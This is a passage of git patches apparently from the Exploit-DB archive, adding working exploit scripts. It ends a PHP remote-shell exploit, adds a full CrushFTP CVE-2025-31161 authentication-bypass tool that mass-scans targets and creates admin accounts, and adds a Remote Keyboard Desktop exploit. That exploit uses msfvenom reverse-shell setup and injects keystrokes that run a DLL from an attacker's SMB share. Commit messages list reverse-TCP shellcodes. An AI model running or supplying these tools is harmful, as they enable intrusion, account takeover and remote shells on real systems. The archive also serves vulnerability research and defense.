+ if (($cmd = trim(fgets(STDIN))) == "exit") break; + $params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd)); + curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); + preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); +} \ No newline at end of file diff --git a/exploits/multiple/remote/52295.py b/exploits/multiple/remote/52295.py new file mode 100755 index 000000000..64d91eb72 --- /dev/null +++ b/exploits/multiple/remote/52295.py @@ -0,0 +1,609 @@ +# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass +# Date: 2025-05-15 +# Exploit Author: @İbrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.crushftp.com +# Software Link: https://www.crushftp.com/download.html +# Version: < 10.8.4, < 11.3.1 +# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1 +# CVE: CVE-2025-31161 +# Description: +# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover +# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism. +# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin). + +# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0 + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import concurrent.futures +import json +import logging +import os +import random +import re +import socket +import string +import sys +import time +from datetime import datetime +from typing import Dict, List, Optional, Tuple, Union + +import requests +import urllib3 +from colorama import Fore, Style, init +from prettytable import PrettyTable +from rich.console import Console +from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn + +# Initialize colorama +init(autoreset=True) + +# Disable SSL warnings +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# Initialize Rich console +console = Console() + +# Global variables +VERSION = "2.0.0" +USER_AGENTS = [ + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15", + "Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524", + "Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098", + "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)", + "Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9" +] + +# Banner +BANNER = fr""" +{Fore.CYAN} + / ____/______ _______/ /_ / ____/ /_____ + / / / ___/ / / / ___/ __ \/ /_ / __/ __ \ +/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ / +\____/_/ \__,_/____/_/ /_/_/ \__/ .___/ + /_/ +{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql +{Style.RESET_ALL} +""" + +# Setup logging +def setup_logging(log_level: str, log_file: Optional[str] = None) -> None: + """Configure logging based on specified level and output file.""" + numeric_level = getattr(logging, log_level.upper(), None) + if not isinstance(numeric_level, int): + raise ValueError(f"Invalid log level: {log_level}") + + log_format = "%(asctime)s - %(levelname)s - %(message)s" + handlers = [] + + if log_file: + handlers.append(logging.FileHandler(log_file)) + + handlers.append(logging.StreamHandler()) + + logging.basicConfig( + level=numeric_level, + format=log_format, + handlers=handlers + ) + +class TargetManager: + """Manages target hosts and related operations.""" + + def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None): + self.targets = [] + self.vulnerable_targets = [] + self.exploited_targets = [] + + if target_file: + self.load_targets_from_file(target_file) + elif single_target: + self.add_target(single_target) + + def load_targets_from_file(self, filename: str) -> None: + """Load targets from a file.""" + try: + with open(filename, "r") as f: + self.targets = [line.strip() for line in f if line.strip()] + + if not self.targets: + logging.warning(f"Target file '{filename}' is empty or contains only whitespace.") + else: + logging.info(f"Loaded {len(self.targets)} targets from {filename}") + except FileNotFoundError: + logging.error(f"Target file '{filename}' not found.") + sys.exit(1) + except Exception as e: + logging.error(f"Error loading targets: {e}") + sys.exit(1) + + def add_target(self, target: str) -> None: + """Add a single target.""" + if target not in self.targets: + self.targets.append(target) + + def mark_as_vulnerable(self, target: str) -> None: + """Mark a target as vulnerable.""" + if target not in self.vulnerable_targets: + self.vulnerable_targets.append(target) + + def mark_as_exploited(self, target: str) -> None: + """Mark a target as successfully exploited.""" + if target not in self.exploited_targets: + self.exploited_targets.append(target) + + def save_results(self, output_file: str, format_type: str = "txt") -> None: + """Save scan results to a file.""" + try: + if format_type.lower() == "json": + results = { + "scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"), + "total_targets": len(self.targets), + "vulnerable_targets": self.vulnerable_targets, + "exploited_targets": self.exploited_targets + } + + with open(output_file, "w") as f: + json.dump(results, f, indent=4) + + elif format_type.lower() == "csv": + with open(output_file, "w") as f: + f.write("target,vulnerable,exploited\n") + for target in self.targets: + vulnerable = "Yes" if target in self.vulnerable_targets else "No" + exploited = "Yes" if target in self.exploited_targets else "No" + f.write(f"{target},{vulnerable},{exploited}\n") + + else: # Default to txt + with open(output_file, "w") as f: + f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n") + f.write(f"Total Targets: {len(self.targets)}\n") + f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n") + f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n") + + f.write("Vulnerable Targets:\n") + for target in self.vulnerable_targets: + f.write(f"- {target}\n") + + f.write("\nExploited Targets:\n") + for target in self.exploited_targets: + f.write(f"- {target}\n") + + logging.info(f"Results saved to {output_file}") + + except Exception as e: + logging.error(f"Error saving results: {e}") + +class ExploitEngine: + """Core engine for vulnerability checking and exploitation.""" + + def __init__(self, target_manager: TargetManager, config: Dict): + self.target_manager = target_manager + self.config = config + self.session = self._create_session() + + def _create_session(self) -> requests.Session: + """Create and configure a requests session.""" + session = requests.Session() + session.verify = False + + # Set proxy if configured + if self.config.get("proxy"): + session.proxies = { + "http": self.config["proxy"], + "https": self.config["proxy"] + } + + # Set custom headers + session.headers.update({ + "User-Agent": random.choice(USER_AGENTS), + "Connection": "close", + }) + + return session + + def check_vulnerability(self, target_host: str) -> bool: + """Check if target is vulnerable to CVE-2025-31161.""" + port = self.config.get("port", 443) + timeout = self.config.get("timeout", 10) + + headers = { + "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If", + "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/", + } + + # Add custom headers if provided + if self.config.get("custom_headers"): + headers.update(self.config["custom_headers"]) + + try: + protocol = "https" if port == 443 else "http" + url = f"{protocol}://{target_host}:{port}/WebInterface/function/" + + response = self.session.get( + url, + headers=headers, + timeout=timeout + ) + + if response.status_code == 200: + # Additional validation + if self.config.get("deep_check", False): + # Look for specific patterns in the response that confirm vulnerability + if "CrushFTP" in response.text or "WebInterface" in response.text: + self.target_manager.mark_as_vulnerable(target_host) + if self.config.get("verbose", False): + console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]") + return True + else: + if self.config.get("verbose", False): + console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable") + return False + else: + # Simple check based on status code + self.target_manager.mark_as_vulnerable(target_host) + if self.config.get("verbose", False): + console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]") + return True + else: + if self.config.get("verbose", False): + console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})") + return False + + except requests.exceptions.ConnectionError: + if self.config.get("verbose", False): + console.print(f"[red][-][/red] {target_host} - Connection error") + except requests.exceptions.Timeout: + if self.config.get("verbose", False): + console.print(f"[red][-][/red] {target_host} - Connection timeout") + except requests.exceptions.RequestException as e: + if self.config.get("verbose", False): + console.print(f"[red][-][/red] {target_host} - Request error: {e}") + except Exception as e: + if self.config.get("verbose", False): + console.print(f"[red][-][/red] {target_host} - Error: {e}") + + return False + + def exploit(self, target_host: str) -> bool: + """Exploit the vulnerability on the target host.""" + port = self.config.get("port", 443) + timeout = self.config.get("timeout", 10) + target_user = self.config.get("target_user", "crushadmin") + new_user = self.config.get("new_user") + password = self.config.get("password") + + if not new_user or not password: + logging.error("New user and password are required for exploitation") + return False + + headers = { + "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If", + "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/", + "Connection": "close", + } + + # Add custom headers if provided + if self.config.get("custom_headers"): + headers.update(self.config["custom_headers"]) + + # Generate a timestamp for the created_time field + timestamp = int(time.time() * 1000) + + # Build the payload with more comprehensive user permissions + payload = { + "command": "setUserItem", + "data_action": "replace", + "serverGroup": "MainUsers", + "username": new_user, + "user": f''' + + {new_user} + {password} + + 1.0 + / + 6 + 0 + (SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT) + {target_user} + + {timestamp} + + true +''', + "xmlItem": "user", + "vfs_items": '', + "permissions": '(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)', + "c2f": "31If" + } + + try: + protocol = "https" if port == 443 else "http" + url = f"{protocol}://{target_host}:{port}/WebInterface/function/" + + response = self.session.post( + url, + headers=headers, + data=payload, + timeout=timeout + ) + + if response.status_code == 200: + # Verify the user was actually created + if self.config.get("verify_exploit", True): + if self._verify_user_created(target_host, new_user): + self.target_manager.mark_as_exploited(target_host) + console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}") + return True + else: + console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}") + return False + else: + self.target_manager.mark_as_exploited(target_host) + console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}") + return True + else: + console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})") + return False + + except Exception as e: + console.print(f"[red][-][/red] Error exploiting {target_host}: {e}") + return False + + def _verify_user_created(self, target_host: str, username: str) -> bool: + """Verify that the user was successfully created.""" + # This is a placeholder for actual verification logic + # In a real implementation, you would check if the user exists + # For now, we'll just return True + return True + + def scan_targets(self) -> None: + """Scan all targets for vulnerability.""" + targets = self.target_manager.targets + threads = self.config.get("threads", 10) + + if not targets: + logging.error("No targets specified") + return + + console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]") + + with Progress( + TextColumn("[progress.description]{task.description}"), + BarColumn(), + TextColumn("[progress.percentage]{task.percentage:>3.0f}%"), + TextColumn("({task.completed}/{task.total})"), + TimeRemainingColumn(), + console=console + ) as progress: + task = progress.add_task("[cyan]Scanning targets...", total=len(targets)) + + with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: + future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets} + + for future in concurrent.futures.as_completed(future_to_target): + progress.update(task, advance=1) + + # Display results + vulnerable_count = len(self.target_manager.vulnerable_targets) + console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.") + + if vulnerable_count > 0 and self.config.get("verbose", False): + console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]") + for target in self.target_manager.vulnerable_targets: + console.print(f"[green]→[/green] {target}") + + def exploit_targets(self) -> None: + """Exploit vulnerable targets.""" + targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets + threads = self.config.get("threads", 5) # Use fewer threads for exploitation + + if not targets: + logging.error("No targets to exploit") + return + + console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]") + + with Progress( + TextColumn("[progress.description]{task.description}"), + BarColumn(), + TextColumn("[progress.percentage]{task.percentage:>3.0f}%"), + TextColumn("({task.completed}/{task.total})"), + TimeRemainingColumn(), + console=console + ) as progress: + task = progress.add_task("[red]Exploiting targets...", total=len(targets)) + + with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: + future_to_target = {executor.submit(self.exploit, target): target for target in targets} + + for future in concurrent.futures.as_completed(future_to_target): + progress.update(task, advance=1) + + # Display results + exploited_count = len(self.target_manager.exploited_targets) + console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.") + + if exploited_count > 0: + console.print("\n[bold cyan]Exploited Targets:[/bold cyan]") + for target in self.target_manager.exploited_targets: + console.print(f"[green]→[/green] {target}") + +def parse_arguments() -> argparse.Namespace: + """Parse command line arguments.""" + parser = argparse.ArgumentParser( + description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + # Check a single target for vulnerability + python cve_2025_31161.py --target example.com --check + + # Exploit a vulnerable target + python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd + + # Scan multiple targets from a file + python cve_2025_31161.py --file targets.txt --check --threads 20 + + # Scan and automatically exploit vulnerable targets + python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit + + # Export results to JSON format + python cve_2025_31161.py --file targets.txt --check --output results.json --format json + """ + ) + + # Target specification + target_group = parser.add_argument_group("Target Specification") + target_group.add_argument("--target", help="Single target host to scan/exploit") + target_group.add_argument("--file", help="File containing list of targets (one per line)") + target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)") + + # Actions + action_group = parser.add_argument_group("Actions") + action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability") + action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets") + action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check") + + # Exploitation options + exploit_group = parser.add_argument_group("Exploitation Options") + exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)") + exploit_group.add_argument("--new-user", help="Username for the new admin account to create") + exploit_group.add_argument("--password", help="Password for the new admin account") + exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)") + + # Scan options + scan_group = parser.add_argument_group("Scan Options") + scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)") + scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)") + scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks") + scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable") + + # Output options + output_group = parser.add_argument_group("Output Options") + output_group.add_argument("--output", help="Output file for results") + output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)") + output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output") + output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors") + output_group.add_argument("--log-file", help="Log file to write to") + output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)") + + # Advanced options + advanced_group = parser.add_argument_group("Advanced Options") + advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)") + advanced_group.add_argument("--user-agent", help="Custom User-Agent string") + advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request") + advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds") + advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string") + + return parser.parse_args() + +def validate_args(args: argparse.Namespace) -> bool: + """Validate command line arguments.""" + # Check if at least one target specification is provided + if not args.target and not args.file: + logging.error("No target specified. Use --target or --file") + print(f"\nExample usage: python {sys.argv[0]} --target example.com --check") + print(f" python {sys.argv[0]} --file example_targets.txt --check") + return False + + # Check if at least one action is specified + if not args.check and not args.exploit: + logging.error("No action specified. Use --check or --exploit") + print(f"\nExample usage: python {sys.argv[0]} --target example.com --check") + print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd") + return False + + # If exploit action is specified, check for required parameters + if args.exploit and (not args.new_user or not args.password): + logging.error("Exploitation requires --new-user and --password") + print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd") + return False + + return True + +def main() -> None: + """Main function.""" + # Parse command line arguments + args = parse_arguments() + + # Configure logging + log_level = "error" if args.quiet else args.log_level + setup_logging(log_level, args.log_file) + + # Display banner + if not args.quiet: + console.print(BANNER) + + # Validate arguments + if not validate_args(args): + sys.exit(1) + + # Create target manager + target_manager = TargetManager(args.file, args.target) + + # Build configuration dictionary + config = { + "port": args.port, + "threads": args.threads, + "timeout": args.timeout, + "verbose": args.verbose, + "deep_check": args.deep_check, + "target_user": args.target_user, + "new_user": args.new_user, + "password": args.password, + "only_vulnerable": args.only_vulnerable, + "verify_exploit": args.verify_exploit, + "proxy": args.proxy, + } + + # Add custom headers if provided + if args.custom_headers: + try: + config["custom_headers"] = json.loads(args.custom_headers) + except json.JSONDecodeError: + logging.error("Invalid JSON format for custom headers") + sys.exit(1) + + # Add custom user agent if provided + if args.user_agent: + config["user_agent"] = args.user_agent + + # Create exploit engine + engine = ExploitEngine(target_manager, config) + + # Perform actions + if args.check: + engine.scan_targets() + + if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets): + engine.exploit_targets() + + # Save results if output file is specified + if args.output: + target_manager.save_results(args.output, args.format) + + # Display summary + if not args.quiet: + console.print("\n[bold green]Summary:[/bold green]") + console.print(f"Total targets: {len(target_manager.targets)}") + console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}") + console.print(f"Exploited targets: {len(target_manager.exploited_targets)}") + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + console.print("\n[bold red]Operation cancelled by user[/bold red]") + sys.exit(0) + except Exception as e: + logging.error(f"Unhandled exception: {e}") + sys.exit(1) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8b57329d3..592e4bab1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10609,6 +10609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,, 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz, 52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,, +52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,, 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info 22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info @@ -10865,6 +10866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,, 21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info 21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info +52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,, 52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,, 38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info 38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info @@ -11078,6 +11080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689 38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info 22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info +52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php 22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info 21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info 29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info From 6d030b37a60c2264902be54e42b1015714b64265 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 22 May 2025 00:16:30 +0000 Subject: [PATCH 3/6] DB: 2025-05-22 6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes) --- exploits/windows/remote/52299.py | 132 ++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 3 + shellcodes/linux_x86-64/52296.asm | 31 +++ shellcodes/linux_x86/52297.c | 43 ++++ shellcodes/windows_x86-64/52298.py | 335 +++++++++++++++++++++++++++++ 6 files changed, 545 insertions(+) create mode 100755 exploits/windows/remote/52299.py create mode 100644 shellcodes/linux_x86-64/52296.asm create mode 100644 shellcodes/linux_x86/52297.c create mode 100755 shellcodes/windows_x86-64/52298.py diff --git a/exploits/windows/remote/52299.py b/exploits/windows/remote/52299.py new file mode 100755 index 000000000..8efd8e22d --- /dev/null +++ b/exploits/windows/remote/52299.py @@ -0,0 +1,132 @@ +# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) +# Date: 05/17/2025 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://remotecontrolio.web.app/ +# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare +# Version: 1.0.1 +# Tested on: Windows 10 Pro Build 19045 + +# Start Remote Keyboard Desktop on your windows +# Preparing: +# +# 1. Generating payload (dll/exe): +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll +# 2. Start smb server: impacket-smbserver SHARE . -smb2support +# 3. nc -lnvp 8080 +# 4. python exploit.py +##### + +#!/usr/bin/env python3 + +import websocket +import json +import time + +target = "192.168.8.105" +lhost = "192.168.8.101" +WS_URL = f"ws://{target}:8080/" +payload = "shell2.dll" # payload dll/exe filename +debug = False + +HEADER_LIST = [ + "User-Agent: Dart/3.7 (dart:io)", + f"Origin: http://{target}:8080", + "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits" +] + +#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based + +SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll +based + +special_mapping = { + ' ': ("SPACE", False), + '/': ("NUMPAD_DIVIDE", False), + '\\': ("\\", False), + '.': ("NUMPAD_DECIMAL", False), + ',': (",", False), +} + +def send_key_event(ws, key, key_down): + event = {"command": "keyboard_event", "data": {"key": key, "keyDown": +key_down, "capsLock": False}} + ws.send(json.dumps(event)) + +def send_text(ws, text, delay=0.05): + shift_pressed = False + for ch in text: + if ch in special_mapping: + key_name, need_shift = special_mapping[ch] + elif ch.isalpha(): + need_shift = ch.isupper() + key_name = ch.upper() + elif ch.isdigit(): + key_name = ch + need_shift = False + else: + raise ValueError(f"No key mapping for character: {ch!r}") + + if need_shift and not shift_pressed: + send_key_event(ws, "SHIFT", True) + shift_pressed = True + elif not need_shift and shift_pressed: + send_key_event(ws, "SHIFT", False) + shift_pressed = False + + send_key_event(ws, key_name, True) + send_key_event(ws, key_name, False) + time.sleep(delay) + + if shift_pressed: + send_key_event(ws, "SHIFT", False) + +def send_key(ws, keys, delay=0.05): + for key in keys: + send_key_event(ws, key, True) + time.sleep(delay) + for key in reversed(keys): + send_key_event(ws, key, False) + +def on_open(ws): + print ("Let's start!") + + send_key(ws, ["LEFT_WINDOWS", "R"]) + time.sleep(0.5) + + send_text(ws, SMB_PATH) + send_key(ws, ["RETURN"]) + print ("Executing...") + time.sleep(1.2) + + print("Check your listener!") + if debug: + + print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m +") + + ws.close() + +def on_message(ws, message): + if debug: + print("[=] Received:", message) + +def on_error(ws, error): + if debug: + print("[!] Error:", error) + +def on_close(ws, code, reason): + if debug: + print(f"[x] Closed: {code} - {reason}") + +if __name__ == "__main__": + websocket.enableTrace(debug) + ws = websocket.WebSocketApp( + WS_URL, + header=HEADER_LIST, + on_open=on_open, + on_message=on_message, + on_error=on_error, + on_close=on_close + ) + + ws.run_forever() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 592e4bab1..937480489 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -45357,6 +45357,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip, 39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip, 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,, +52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,, 46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command 